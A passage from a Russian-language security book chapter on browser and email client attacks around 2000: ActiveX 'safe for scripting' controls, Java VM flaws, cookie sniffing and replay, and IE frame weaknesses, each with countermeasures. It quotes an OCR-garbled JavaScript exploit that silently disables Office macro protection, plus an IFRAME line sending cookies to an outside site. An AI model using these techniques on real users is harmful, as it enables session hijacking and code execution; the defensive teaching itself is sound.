    Этот изъян интерфейсов программного обеспечения, позволяющий получить к ним доступ, Ричард М. Смит (Richard M. Smith) назвал "случайным троянским конем". Установленные на жесткий диск многих пользователей вместе с таким популярными приложениями, как IE, данные элементы управления ActiveX ожидают, пока кто-нибудь не установит с ними удаленное соединение (http: //www. tiac.net/users /smiths/acetroj/index.htm).
    Масштабы потенциального воздействия могут быть устрашающими. Чтобы установить флаг "safe for scripting" для элемента управления ActiveX, нужно либо реализовать в них интерфейсIObjectSafety, либо пометить их как безопасные. Для этого в системном реестре в ключ Implemented Categories, соответствующий данному элементу управления, необходимо добавить параметр 7DD95801-9882-11CF-9FA9-OOAA006C42C4 . Зачастую в системном реестре Windows находится несколько десятков таких элементов управления. Для подобных атак могут быть использованы те из них, которые могут выполнять действия с повышенными привилегиями (например, запись на диск или запуск кода).
    Есть несколько способов, позволяющих определить, какие из элементов управления активно используются системой. Для обычного просмотра активных приложений СОМ (включая элементы управления ActiveX), установленных на компьютере, щелкните на кнопке Start, выберите команду Run и введите dcomcnfg. При этом на экране появится диалоговое окно, представленное на следующем рисунке.


    Чтобы посмотреть, имеются ли среди этих объектов помеченные как "safe for scripting", воспользуйтесь утилитой oleview из набора NT Resource Kit (ее более новая версия входит в среду разработки приложений Visual Studio компании Microsoft). Утилита oleview позволяет просмотреть все зарегистрированные в системе объекты COM/ActiveX. Кроме того, она выводит их идентификатор класса (CLSID — Class ID), используемый при обращении к этим объектам в системном реестре, и многие важные параметры из поддерева Implemented Categories системного реестра.
    Кроме того, утилита oleview отображает интерфейсы, экспортируемые объектами. Это помогает понять, является ли данный объект хорошей целью для взломщика, захват которой позволит выполнить операции с повышенными привилегиями.
    Вполне закономерно, что почти год спустя хакером DilDog из группы "Cult of the Dead Caw" (см. главу 4 о знаменитом программном продукте Back Orifice) был обнаружен еще один подобный элемент управления под именем Office 2000 UA (OUA). Он регистрируется системой во время установки компонентов Microsoft Office. Для доказательства своей концепции хакер DilDog создал Web-страницу, посредством которой можно удаленно инстанцировать элемент OUA, установленный в системе пользователя, а затем с его помощью отключить защиту макросов документов Office без предупреждения пользователя. Далее с этой страницы загружается файл с именем evil .doc, в котором содержится простой макрос, создающий файл С: \dildog-was-here. txt. Удаленное инетанцирование OUA осуществляется с помощью следующего кода, внедренного на Web-странице. var ua;

    function setup() {
    // Создание элемента UA
    ua = new ActiveXObject("OUACtrl.OUACtrl.1");
    // Присоединение объекта ua к объекту ppt ua.WndClass=
    "OpusApp"; ua.OfficeApp=0;
    // Проверка того, что объекты UA "видят"
    приложение Office return ua.IsAppRunning();
    )
    function disablemacroprotection()
    {
    var ret;
    // Активизация приложения ua.AppActivate();
    // Отображение диалогового окна защиты макросов

    ua.ShowDialog(ОхОЕ2В);
    // Щелчок на кнопке 'low' ua.SelectTabSDM(Ox!3);
    // Щелчок на кнопке 'ok' ua.SelectTabSDM(l);
    }
    function enablemacroprotection()
    {
    // Активизация приложения
    ua.AppActivate ();
    // Отображение диалогового окна защиты макросов
    ua.ShowDialog(OxOE2B);
    // Щелчок на кнопке 'medium' ua.SelectTabSDM(0x12);
    // Щелчок на кнопке 'ok'
    ua.SelectTabSDM(1); }
    // Начало выполнения сценария if(setupO)
    {
    disablemacroprotection();
    parent.frames["blank"].location—
    }
    </script>
    </body>
    </html>

    Элементы управления, помеченные как "safe for scripting", могут вызываться также из электронных сообщений в формате HTML. В этом случае их гораздо легче разместить в нужном месте, поэтому они могут быть более опасны. Подобные "бомбы" обсуждаются в следующих разделах, посвященных хакингу через электронную почту.

    Защита от использования флага "safe for scripting"



    Для защиты от этих серьезных изъянов пользователям Internet можно предложить три метода. Мы рекомендуем воспользоваться всеми тремя способами.
    Во-первых, установите все имеющиеся модули обновления.  Однако не забывайте о том, что это лишь локальное решение проблемы: при использовании этих модулей обновления флаг "safe for scripting" будет изменен только для конкретных элементов управления. Они не обеспечивают глобальной защиты против любых атак, основанных на применении других элементов управления, помеченных как безопасные. Мы еще не до конца обсудили "случайного троянского коня" и вернемся к нему немного позже.
    Вторая контрмера направлена исключительно против элемента OUA и ему подобных, использующих для выполнения своей грязной работы макросы Office. В Office 2000 установите самый высокий уровень защиты макросов (High), выбрав команду Tools>Macro>Security (таким образом необходимо настроить каждое приложение в отдельности, поскольку это нельзя сделать глобально).
    Третья и наиболее эффективная контрмера заключается в ограничении использования или полном отключении элементов управления ActiveX. О том, как это сделать, рассказывается в разделе, посвященном зонам безопасности. Но перед этим следует уделить внимание еще одному изъяну, связанному с элементами ActiveX.
    Разработчикам можно посоветовать, чтобы они не устанавливали флаг "safe for scripting" для тех элементов управления, которые выполняют в пользовательской системе действия с высокими привилегиями. Конечно, это касается только тех, кто не хочет превзойти Георгия Гунинского.

    После инстанцирования элементы управления ActiveX остаются в памяти до тех пор, пока не будут выгружены. Для этого в командной строке введите команду regsvr32 /u [Имя_элемента].

    Активная загрузка файлов



    Независимый исследователь проблем безопасности Хуан Карлос Гарсия Квартанго (Juan Carlos Garci'a Cuartango), внимание которого особенно привлекает броузер Internet Explorer, поместил на своем Web-узле информационное сообщение об одном из его изъянов. Это оказалось настолько важным, что сообшение было переведено на английский язык (тогда как остальная информация узла была представлена на испанском). Суть изъяна заключается в возможности генерирования состояния отказа в обслуживании (DoS — Denial of Service), если для загрузки файлов с расширением .CAB, имеющих сертификат компании Microsoft, используется элемент управления ActiveX. При этом файлы загружаются в любое указанное место диска, даже если для этого необходимо записать их поверх других файлов.

    Контрмеры



    Компания Microsoft выпустила соответствующий модуль обновления, который можно найти по адресу http://www.microsoft.com/security (Bulletin MS00-42).

    В системе Windows 2000 защиту определенных системных файлов от перезаписи обеспечивает служба WFP (Windows File Protection).

    Разумное использование зон безопасности: общее решение проблемы элементов ActiveX
    Возможно, к этому моменту многие читатели пришли к выводу, что элементы управления ActiveX стали проклятием клиентов Internet, нарушающим спокойствие и безопасность пользователей. Такое мнение не учитывает основную закономерность: чем более мощной и распространенной становится технология, тем больший потенциал в ней заключен. И этот изъян способен привести к различным, в том числе и к разрушительным последствиям. Элементы управления ActiveX — мощная и популярная технология; поэтому она может принести большой вред, если служит злонамеренным целям (более полно возможности ActiveX раскрыты в последующих разделах, где рассказывается о хакинге электронной почты). Конечные пользователи всегда стремятся к автоматизации выполнения своих повседневных задач, и элементы ActiveX — это один из инструментов, который способен удовлетворить эти потребности. Можно просто закрыть глаза и надеяться, что на сегодня все обойдется, а потом на смену этому программному обеспечению придет новое. Однако это далеко не лучший выход. Новые технологии, находящиеся где-то за горизонтом, скорее всего, будут таить в себе примерно те же опасности.
    Общим решением проблемы, связанной с элементами управления ActiveX (не важно, связана ли она с использованием флага "safe for scripting"), является ограничение их возможности осуществлять над системой привилегированный контроль. Для этого требуется определенное понимание одного из наиболее значительных аспектов обеспечения безопасности системы Windows — зон безопасности (security zone). Поэтому для повышения степени защиты необходимо научиться правильно их использовать.

    Одной из лучших ссылок по этой теме является статья Q174360 из базы знаний компании Microsoft (http://support.microsoft.com). Там вы найдете много ценной информации о зонах безопасности. 

    По существу, модель зон безопасности позволяет определять разные уровни доверия для кода, загружаемого с одной из четырех зон: Local Intranet (Местная зона (интрасеть)), Trusted Sites (Зона надежных узлов), Internet (Зона Internet) и Restricted Sites (Зона ограниченных узлов). Существует еще пятая зона, которая называется Local Machine (Локальная машина), однако в пользовательском интерфейсе она недоступна, настроить ее можно только с помощью средств администрирования IEAK (IE Administration Kit)
    В любую зону, за исключением зоны Internet, узлы можно добавлять вручную. В зоне Internet содержатся все узлы, не включенные в любую другую зону, которые содержат в своем URL символ точки (.) (например, узел http: //local по умолчанию входит в местную зону, тогда как узел http://www.microsoft.com находится в зоне Internet, поскольку в его адресе встречаются точки). При посещении узла, входящего в какую-то зону, активизируются соответствующие ей параметры безопасности (например, в зависимости от этого возможность запуска элементов управления ActiveX ("Run ActiveX controls") может быть разрешена или запрещена). Поэтому очень важно правильно настроить зону Internet, поскольку по умолчанию к ней относятся все посещаемые пользователями узлы. Конечно, если вручную добавить узел в другую зону, то на него это правило распространяться уже не будет. При перемещении узлов из одной зоны в другую будьте очень внимательны (в корпоративных локальных сетях наполнение других зон обычно производится администраторами этих сетей).
    Чтобы настроить параметры безопасности зоны Internet, выберите в броузере Internet Explorer команду Tools^Internet Options и перейдите во вкладку Security (или запустите аплет Internet Options панели управления). Затем выберите в раскрывающемся списке элемент Internet zone и задайте требуемый уровень безопасности. Мы рекомендуем установить уровень безопасности High, а затем выбрать режим Custom Level и вручную настроить несколько других параметров, как показано в табл. 16.1.

    Таблица 16.1. Рекомендуемые параметры безопасности зоны Internet( настройки уровня Custom Level нужно выполнять после того, как по умолчанию задан уровень безопасности High)

    Категория
    Имя параметра
    Режим
    Комментарий
    ActiveX controls and plug-ins (элементы управления ActiveX и модули подключения)
    Script ActiveX controls marked as safe for scripting
    (выполнять сценарии элементов управления ActiveX, помеченных как безопасные)
    Disable (отключить)
    На взгляд авторов, пояснения излишни
    Cookies (файлы "cookie")
    Allow per-session cookies (not stored) (позволить использование cookies в течение одного сеанса (без сохранения))
    Enable (использовать)
    Мы предпочитаем использовать режим Prompt (запрашивать), но тогда постоянно возникающее окно подтверждения становится слишком назойливым
    Downloads (загрузка)
    File download (загрузка файла)
    Enable (использовать)
    Хотелось бы в этом пункте порекомендовать режим Prompt, однако здравый смысл подсказывает, что лучше установить режим Enable
    Scripting (сценарии)
    Active scripting (активные сценарии)
    Prompt (запрашивать)
    В данном случае нельзя сформулировать четкие критерии, поэтому лучше активизировать более консервативный режим

    Параметры, позволяющие запретить использование элементов управления ActiveX, показаны на рис. 16.1.
    Отключение элементов управления ActiveX может сказаться на возможности просмотра узлов, на которых отображение различных спецэффектов основано на этих элементах. На заре развития Web динамическая работа многих узлов в значительной степени зависела от загружаемого кода, в том числе и от элементов ActiveX. К счастью, в настоящее время эта парадигма все больше вытесняется расширениями языка HTML и сценариями, выполняющимися на сервере. Поэтому при работе с большинством узлов отключение элементов ActiveX не приведет к возникновению проблем, как это было раньше. Очевидным исключением из этого правила являются узлы, на которых используются элементы управления Shockwave компании Macromedia. При попытке просмотра таких узлов на экране появится следующее сообщение.



    Рис. 16.1. Отключение элементов управления ActiveX с помощью аплета Internet Options панели управления позволит защитить систему от загрузки вредоносных элементов управления с враждебных Web-страниц

    Если вы все же хотите воспользоваться преимуществами звуковых и анимационных эффектов, обеспечиваемых элементами Shockwave, придется допустить использование элементов ActiveX (конечно, если не задействован броузер Netscape, в котором элементы Shockwave выступают в качестве подключаемых модулей). Другим ориентированным на элементы ActiveX узлом, который посещается многими пользователями, является узел Windows Update компании Microsoft (WU), на котором элементы ActiveX используются для сканирования компьютера пользователя, а также для загрузки и установки нужных модулей дополнения. Этот Web-узел оказался удачной идеей. Он позволяет сэкономить огромное количество времени, требуемого для поисков отдельных модулей обновления (что особенно важно для обеспечения безопасности!), и автоматически определить, была ли ранее установлена правильная версия. Однако мы не думаем, что из-за одного узла, предоставляющего такие удобства, стоит полностью разрешать использование элементов управления ActiveX. Еще хуже то, что после запрещения использования элементов ActiveX в броузере Internet Explorer нельзя воспользоваться механизмом автоматического поиска адреса по фрагменту URL, введенному в адресной строке (например, когда по подстроке mрЗ требуется найти узел http: //www.mp3. com).
    Одно из возможных решений этой проблемы заключается в ручном включении режима применения элементов ActiveX во время посещения надежного узла. Затем его придется отключить, и снова вручную. Разумнее занести эти узлы в зону надежных узлов. Присвойте этой зоне более низкий уровень безопасности (рекомендуется Medium (Средний)), а затем добавьте в нее надежные узлы, например WU (windowsupdate.microsoft.com). Таким образом, при посещении узла WU будут применяться менее жесткие параметры безопасности, и будут доступны возможности узла, связанные с использованием элементов ActiveX. Аналогично добавление в зону Trusted Sites узла auto.search.msn.com позволит задать соответствующие установки безопасности, позволяющие осуществлять поиск по содержимому адресной строки. Удобно, не правда ли?

    Соблюдайте осторожность и добавляйте в зону надежных узлов только те из них, которые пользуются высокой степенью доверия, поскольку к ним будет применяться меньше ограничений, связанных с загрузкой их активного содержимого и запуском. Следует иметь в виду, что даже респектабельный Web-узел может быть взломан хакерами-злоумышленниками, или в группе его разработчиков может оказаться негодяй, охотящийся за данными пользователей (а возможны и худшие варианты).

    Для безопасного чтения электронных сообщений приложения Outlook и Outlook Express можно настроить так, чтобы в них тоже учитывались зоны безопасности. Параметры Outlook и Outlook Express позволяют выбрать зону, уровень безопасности которой будет использоваться при обработке содержимого, отображаемого почтовой программой. Имеется две возможности: Internet и Restricted Sites. Конечно же, рекомендуется выбрать зону ограниченных узлов (новый модуль Outlook 2000 Security Update выполняет эту установку самостоятельно). Убедитесь в том, что в параметрах зоны Restricted Sites полностью отключены все категории активного содержимого! Для этого установите уровень безопасности High, а затем задайте режим Custom Level и отключите все режимы, которые остались включенными (если их отключить нельзя, установите переключатель в положение, соответствующее наивысшему уровню безопасности). Процесс настройки зоны Restricted Sites в Outlook показан на рис. 16.2Д
    Как и в Internet Explorer, в Outlook можно смягчить самые сильные ограничения. Однако в электронных сообщениях активное содержимое встречается реже, чем на Web-страницах. Поэтому предупреждающие сообщения о них доставляют меньше беспокойства. Однако в этом случае опасность, возникающая в процессе интерпретации сообщения, намного превышает преимущества его эстетического восприятия. Читателям, которые не доверяют этому утверждению, рекомендуется дочитать главу до конца. Замечательной особенностью зон безопасности является то, что с их помощью можно заставить Outlook вести себя более консервативно, чем Web-броузер. Гибкость программного обеспечения и умение правильно пользоваться его параметрами приведет к повышению безопасности.



    Рис. 16.2. С помощью команды Tools >Options>Security пользователи Outlook найдут схожие (но все же различные) группы параметров, позволяющие защититься от атак, которые реализуются с помощью сообщений электронной почты

    Изъяны в системе защиты Java



    В 1990 году компания Sun Microsystems решила создать парадигму программирования, которая помогла бы решить многие проблемы разработки программ, стоящие перед их создателями еще со времен зарождения вычислительной техники. В результате одним выстрелом удалось убить двух зайцев: создать новый язык Java и попутно решить многие традиционные проблемы обеспечения безопасности. Большинство людей полагают, что язык Java безопасен на все 100%, поскольку с самого начала был задуман как нечто исключительное. Это мнение в значительной мере подкрепляется маркетинговой политикой компании Sun. Конечно же, обеспечить абсолютную безопасность невозможно. Однако пути ее повышения, применяемые в Java, несомненно, представляют определенный интерес. (Ниже будет рассмотрена архитектура Java 2, или JDK 1.2, которая в момент написания книги являлась текущей.)
    Java — тщательно продуманный язык, позволяющий программистам избежать многих ошибок, которые могут привести к таким проблемам безопасности, как переполнение буфера. На этапе компиляции и выполнения виртуальной машиной Java (JVM — Java Virtual Machine) и встроенным механизмом проверки байт-кода осуществляется строгий контроль типов, что помогает защитить используемые программой области памяти. Кроме того, в языке Java не поддерживается доступ к памяти и манипуляция ею с помощью указателей, позволяющих программисту управлять использованием и загрузкой кода.
    Кроме того, в JVM есть встроенный диспетчер безопасности (Security Manager), выполняющий контроль доступа к системным ресурсам. Его работа основана на политике безопасности, задаваемой пользователем. Наряду с проверкой типов эти концепции создают ограничительный барьер, не позволяющий коду Java выполнять привилегированные действия без явного согласия пользователя. В дополнение ко всему вышесказанному язык Java позволяет использовать сертификаты, определяющие степень "надежности" загруженного извне кода или доверия к нему. Основываясь на своем доверии к данному сертификату, пользователь принимает решение, запускать данный код или нет (что во многом напоминает работу Authenticode).
    Наконец, спецификация Java открыта для широкой общественности, с которой без проблем можно познакомиться по адресу http://java.sun.com. Очевидно, такая открытость для критики и анализа приводит к естественному отбору и избавлению от различных недостатков.
    Теоретически эти механизмы преодолеть крайне сложно (фактически, для многих из них имеется формальное доказательство их безопасности). Однако на практике механизмы безопасности Java были взломаны много раз. Это произошло по той же хорошо известной причине, когда в процессе реализации нарушаются принципы, заложенные при проектировании. Хороший обзор, посвященный истории развития механизмов обеспечения безопасности в Java, можно найти на Web-странице Secure Internet Programming Принстонского университета. В последующих разделах описываются основные проблемы последних реализаций Java, предоставляющие наибольший интерес для пользователей клиентских приложений.

    Ошибки JVM броузера Netscape Communicator



    В апреле 1999 года сотрудник Марбургского университета (Германия) Карстен Зор (Karsten Sohr) обнаружил изъян важного компонента безопасности JVM броузера Netscape Communicator. При определенных обстоятельствах виртуальная машина Java не проверяет загружаемый в нее код. Использование этого изъяна позволяет взломщику запустить код, разрушающий механизмы проверки типов Java, и реализовать взлом со смешением типов (type confusion attack). Это классический пример отступления реализации от первоначального замысла.

    Отключение Java в броузере Netscape



    Обновите текущую версию Netscape, или отключите Java, выполнив следующие действия (рис. 16.3).
    1. В программе Communicator выберите команду Edit^Preferences.
    2. В появившемся диалоговом окне Preferences выберите категорию Advanced.
    3. В этом же диалоговом окне сбросьте флажок Enable Java.
    4. Щелкните на кнопке ОК.
    Авторы считают, что возможность использования сценариев JavaScript можно оста-вито включенной. К тому же в настоящее время сценарии JavaScript настолько интенсивно используются Web-узлами, что от них практически невозможно отказаться. Однако мы настоятельно рекомендуем отключить возможность применения JavaScript в почтовом клиенте и приложении чтения новостей программы Netscape, как это показано на рис. 16.3



    Рис. 16.3. Отключите Java в Netscape Communicator, чтобы защититься против опасных аплетов Java. Сценарии JavaScript представляют собой меньшую опасность, однако этот резким должен быть отключен для служб Mail и News

    Изъян в механизме обеспечения безопасности Microsoft Java



    В броузере Internet Explorer вскоре была обнаружена аналогичная ошибка. Из-за недостатков реализации механизма обеспечения безопасности в JVM компании Microsoft появилась возможность полностью обойти механизмы защиты с помощью хитро запрограммированного аплета, размещенного на удаленном Web-сервере, или встроенного в сообщение электронной почты в формате HTML.

    Устранение ошибок в Internet Explorer



    Чтобы узнать, уязвима ли используемая вами версия программы, введите в командной строке команду jview. Найдите номер сборки (последние четыре цифры номера версии) и определите, к какой из следующих категорий он относится.

    Версия
    Состояние
    1 520 или ниже
    Ошибка отсутствует
    2000-2438
    Есть ошибка
    3000-3167
    Есть ошибка

    Не удивляйтесь, если после выполнения команды jview окажется, что изъян существует, даже если Internet Explorer не установлен. Некоторые другие продукты компании Microsoft, такие как Visual Studio, тоже устанавливают виртуальную машину Java. Во время написания этого раздела немало был удивлен и автор, когда выяснил, что у него на компьютере тоже установлена версия JVM с изъяном. Она была установлена вместе с IE 5.0 через год с момента выпуска модуля обновления!
    Модуль обновления, который называется Virtual Machine Sandbox, можно найти по адресу http://www.microsoft.com/windows/ie/security/default.asp в списке других модулей обновления броузера Internet Explorer. В качестве крайней меры можно попробовать даже полностью отключить Java, хотя в этом случае Web-страницы с аплетами Java (которые работают со стороны клиента) потеряют всю свою привлекательность. Чтобы отключить Java в Internet Explorer, нужно выполнить действия, описанные в одном из предыдущих разделов, посвященном зонам безопасности. Кроме того, помимо установки уровня безопасности High для зоны Internet, нужно также вручную отключить все параметры, которые ссылаются на Java.

    Brown Orifice и новые ошибки в Java



    Летом 2000 года Дан Брумлев (Dan Brumleve) сообщил о двух выявленных изъянах. относящихся к реализации Java в Netscape Communicator. В частности, он установил, что в некоторых файлах библиотек классов Java при выполнении определенных операций не выполняется надлежащая проверка безопасности или результаты этой проверки игнорируются. В число классов, о которых идет речь, входит класс java.net. ServerSocket, используемый для создания прослушиваемых сетевых сокетов для входящих сетевых соединений, а также классы netscape, net. URLConnection и netscape.net.URLlnputSteam, содержащие абстрактные стандартные методы чтения локальных файлов. Во всех этих трех классах содержатся методы, в которых некорректно вызывается метод SecurityManager .check, определяющий, действительно ли данный аплет обладает правами доступа, необходимыми для выполнения некоторых действий. Если проверка завершилась неудачей, то это исключение игнорируется.
    Оба этих изъяна были заложены в реализацию аплета Java, в котором перечисленные методы служат для создания портов прослушивания и получения права на чтение файловой системы. Дан написал код на языке Java и поместил его на своем Web-узле в качестве примера, иллюстрирующего справедливость концепции и возможность использования обнаруженных изъянов для взлома броузеров Internet. Он создал простую форму, позволяющую пользователю выбирать каталог для совместного применения и порт, который необходимо прослушивать. Эта информация передавалась в сценарий CGI на языке Perl, который обращался к разработанным Даном классам Java, устанавливая возможность совместного обращения к указанным каталогам и создавая со стороны клиента порты прослушивания, связанные с этими каталогами.
    Демонстрируя прекрасное чувство юмора, Дан позаботился о поддержке возможностей, подобных возможностям программного продукта Napster, позволяя пользователям совместно работать с файлами через одноранговую сеть, которая создается миллионами пользователей, ведущих обмен данными с помощью протокола HTTP. Однако недооценивать серьезность проблемы не следует, хотя бы потому, что она позволяет устанавливать доступ к данным и выполнять их чтение. Обнаруженная Даном ошибка достаточно опасна. Она позволяет пользователям выбрать удаленный каталог, к которому они хотят иметь доступ. Можно разработать и более опасные аплеты, которые могут работать более скрытно и выявлять каждую систему с броузером Netscape, где можно поживиться важной информацией.

    Контрмеры против Brown Orifice



    Как обычно, единственный надежный способ защиты от опасных аплетов заключается в запрете использования Java в Web-броузере. Сделать это можно в броузере Netscape, как описано выше в разделе "Отключение Java В Броузере Netscape" и показано на рис. 16.3. Мы рекомендуем использовать эти параметры пользователям Netscape.
    Компания Netscape не позаботилась о разработке модулей обновления, устраняющих ошибку. Данный изъян имеется в версиях с 4.0 по 4.74 броузера Communicator, которые можно использовать в операционных системах Windows, Macintosh и UNIX. В Netscape 6 этой ошибки нет.


    1.gif

    Изображение: 

    3.gif

    Изображение: 

    4.gif

    Изображение: 

    5.gif

    Изображение: 

    6.gif

    Изображение: 

    4. Остерегайтесь монстра Cookie



    Остерегайтесь монстра Cookie


    Задумывались ли вы когда-нибудь о том, как на некоторых Web-узлах происходит персонификация посетителей? Это может выражаться, например, в запоминании содержимого "тележки" (если этот узел предназначен для продажи товаров) или в способе заполнения полей какой-нибудь формы. В протоколе HTTP, лежащем в основе функционирования World Wide Web, нет средств, позволяющих отслеживать события от одного посещения узла к другому, поэтому для возможности хранения таких "состояний" было разработано специальное дополнение. Этот механизм, описанный в документе RFC 2109, обеспечивает вставку в передаваемые запросы и ответы HTTP специальных фрагментов данных cookie, позволяющих Web-узлам отслеживать своих посетителей. Данные cookie могут запоминаться на время сеанса связи (per session), оставаясь в оперативной памяти в течение одного сеанса и удаляясь при закрытии броузера, или даже после истечения заданного промежутка времени. В других случаях они бывают постоянными (persistent), оставаясь на жестком диске пользователя в виде текстового файла. Обычно они хранятся в каталоге Cookies (%windir% \Cookies — в Win9x и %userprofile%\Cookies — в NT/2000). Нетрудно догадаться, что после захвата файлов cookie в Internet взломщик может выдавать себя за пользователя данного компьютера, или собирать содержащуюся в этих файлах важную информацию. Прочитав следующие разделы, вы поймете, насколько просто это сделать.

    Перехват файлов cookie



    Самый прямой способ заключается в перехвате файлов cookie при их передаче по сети. Затем перехваченные данные можно использовать при входе на соответствующий сервер. Такую задачу можно решить с помощью любой утилиты перехвата пакетов, однако одной из лучших является программа Лаврентия Никулы (Laurentiu Nicula) SpyNet/PeepNet . В состав SpyNet входят две утилиты, которые работают в комплексе. Программа CaptureNet выполняет захват самого пакета и сохраняет его на диске, а утилита PeepNet открывает этот файл и преобразует его в читабельный формат. Следующий пример является фрагментом восстановленного программой PeepNet сеанса связи, во время которого файл cookie служит для аутентификации и управления доступом к просматриваемым страницам (для сохранения анонимности имена изменены).

    GET http://www.victim.net/images/logo.gif HTTP/1.0
    Accept: */*
    Referrer: http://www.victim.net/
    Host: www.victim.net
    Cookie: jrunsessionid=96114024278141622;
    cuid=TORPM!ZXTFRLRlpWTVFISEblahblah

    В приведенном примере виден фрагмент cookie, помещенный в поступающий на сервер запрос HTTP. Наиболее важным является поле cuid=, в котором задается уникальный идентификатор, используемый при аутентификации пользователя на узле www.victim.net. Допустим, что после этого взломщик посетил узел victim.net, получил собственный идентификатор и файл cookie (предполагается, что узел помещает данные cookie не в виртуальную память, а записывает их на жесткий диск). Тогда взломщик может открыть свой собственный файл cookie и заменить в нем идентификатор поля cuid=, взяв его из перехваченного пакета. В этом случае при входе на сервер victim.net он будет восприниматься как пользователь, чьи данные cookie были перехвачены.
    Способность программы PeepNet воспроизводить весь сеанс связи или его фрагмент значительно облегчает реализацию атак этого типа. С помощью кнопки Go get it! можно повторно извлечь страницы, которые просматривались пользователем, используя его данные cookie, перехваченные ранее программой CaptureNet. В диалоговом окне утилиты PeepNet можно увидеть информацию о чьих-то выполненных распоряжениях. При этом для аутентификации используются данные cookie, перехваченные программой CaptureNet. Обратите внимание на фрейм, расположенный в нижнем правом углу диалогового окна с данными сеанса связи, и на строку, которая следует за строкой Cookie:. Это данные cookie, используемые при аутентификации.
    Это довольно ловкий трюк. Кроме того, утилита CaptureNet может предоставить полную запись трафика в расшифрованном виде, что практически равносильно возможностям утилит профессионального класса, таких как Sniffer Pro компании Network Associates, Inc. Однако утилита SpyNet еще лучше — ее можно получить бесплатно!

    Контрмеры



    Следует остерегаться узлов, на которых файлы cookie применяются для аутентификации и хранения важных идентификационных данных. Одним из инструментов, помогающих в обеспечении защиты, является программа Cookie Pal компании Kookaburra Software, которую можно найти на Web-узле http://www.kburra.com/cpal.html. Этот программный продукт можно настроить так, чтобы для пользователя генерировались предупреждающие сообщения о попытках Web-узла воспользоваться механизмом cookie. При этом можно "заглянуть за кулисы" и решить, следует ли разрешать выполнение этих действий. В Internet Explorer имеется встроенный механизм поддержки файлов cookie. Чтобы активизировать его, запустите аплет Internet Options панели управления, перейдите во вкладку Security, выберите элемент Internet Zone, установите режим Custom Level и для постоянных и временных данных cookie установите переключатель в положение Prompt. Настройка использования файлов cookie в броузере Netscape выполняется с помощью команды Edit>Preferences>Advanced и установки режима Warn me before accepting a cookie или Disable cookies (рис. 16.3). Принимая файл cookie, нужно проверить, записался ли он на диск, и узнать, собирает ли Web-узел информацию о пользователях.
    Посещая узел, на котором файлы cookie служат для аутентификации, необходимо убедиться, что первоначально сообщаемые имя и пароль шифруются хотя бы с помощью протокола SSL. Тогда эта информация появится в окне программы PeepNet по меньшей мере не в виде простого текста.
    Авторы предпочли бы полностью отказаться от файлов cookie, если бы многие часто посещаемые Web-узлы не требовали этого режима. Например, для популярной во всем мире службы Hotmail компании Microsoft наличие файлов cookie обязательно для регистрации. Поскольку эта служба в процессе аутентификации задействует несколько различных серверов, то добавить их в зону надежных узлов не так-то просто (этот процесс описан в разделе "Разумное Использование Зон Безопасности: Общее Решение Проблемы Элементов Activex"). В этом случае поможет обозначение * .hotmail.com. Файлы cookie — далеко не идеальное решение проблемы неполноты протокола HTML, однако альтернативные подходы, по-видимому, еще хуже (например, добавление к адресу URL идентификатора, который может храниться на proxy-серверах). Пока не появится идея получше, единственным выходом остается контроль над файлами cookie с помощью перечисленных выше методов.

    Захват файлов cookie через URL



    Представим себе нечто ужасное: пользователи Internet Explorer щелкают на специально сконструированных гиперссылках и становятся потенциальными жертвами, рискуя, что их файлы cookie будут перехвачены. Беннет Хазельтон (Bennett Haselton) и Джеми Маккарти (Jamie McCarthy) из тинейджерской организации Peacefire, ратующей за свободу общения через Internet, опубликовали сценарий , воплощающий эту идею в жизнь. Этот сценарий извлекает файлы cookie с клиентского компьютера, если его пользователь щелкает на ссылке, содержащейся на этой странице. В результате содержимое файла cookie становится доступным для операторов Web-узла.
    Эту возможность можно использовать в неблаговидных целях, внедряя дескрипторы IFRAME в HTML-код Web-страницы, электронного сообщения в формате HTML или сообщения из группы новостей. В следующем примере, предложенном консультантом по вопросам безопасности Ричардом М. Смитом, демонстрируется возможность использования дескрипторов IFRAME совместно с утилитой, разработанной организацией Peacefire.

    <iframe src="http://www.peacefire.org%2fsecurity%2fiecookies%2f
    showcookie . html%3f. yahoo . com/"x/if rame>

    Можно составить коварное электронное сообщение, которое "захватывало" бы файлы cookie с жесткого диска пользователя и передавало их операторам узла peacefire.org. Для этого в него много раз нужно поместить ссылку на этот узел так, как показано в примерю. Несмотря на то что ребята из Peacefire выглядят довольно приятными людьми, вряд ли кому-нибудь понравится, если к ним в руки попадут конфиденциальные данные.

    Контрмеры



    Установите модуль обновления, который можно найти по адресу http://www. microsoft.com/technet/security/bulletin/ms00-033.asp. Можно воспользоваться также программой Cookie Pal или встроенными возможностями Internet Explorer, как описано выше.


    5. Изъяны фреймов HTML в Internet Explorer



    Изъяны фреймов HTML в Internet Explorer


    Малоизвестной особенностью броузера Internet Explorer является возможность использования доменной модели обеспечения безопасности ("cross-domain security model"). Исчерпывающее описание этой концепции можно найти по адресу http://www.microsoft.com/technet/security/bulletin/fq00-009.asp. Вкратце это означает следующее. Описываемая модель скрыто используется и предотвращает чтение, доступ и любые другие операции с данными, открытыми в окне одного узла (простейшая форма домена IE), со стороны окна другого узла. При таком подходе фреймы HTML, открытые в каком-либо окне, должны быть доступны только из родительского окна при условии, что оба они относятся к одному и тому же домену.
    Интересной особенностью этой модели является то, что локальная файловая система, содержимое которой можно просматривать с помощью Internet Explorer, тоже рассматривается как домен. Таким образом, при нарушении доменной безопасности в распоряжении нечестных операторов Web-узлов окажется много возможностей просмотра данных не только других узлов, посещаемых пользователем, но и файлов, которые находятся на его собственном жестком диске.
    Используя некоторые из возможных подходов, достаточно написать лишь несколько строк кода и поместить его на Web-узле или отправить в электронном сообщении. Ниже приведено несколько реализаций этой идеи.

    Чтение других доменов с помощью дескриптора IFRAME и document.execCommand



    Эксперт в области безопасности броузеров Георгий Гунински (Georgi Guninski) обнаружил несколько случаев нарушения модели доменной безопасности, предотвращающей обмен данными между доменами.
    При реализации кода Георгий часто использовал дескриптор iFRAME, который уже упоминался выше. Этот дескриптор является расширением стандарта HTML 4.0. В отличие от стандартного дескриптора FRAME, i FRAME позволяет создать плавающий фрейм, который располагается посредине обычной Web-страницы, не содержащей фреймов, подобно вставленному в нее изображению. Это довольно простой способ вставки содержимого других узлов (и даже файловой системы) внутрь Web-страницы, который прекрасно подходит для скрытого получения доступа к данным других доменов.
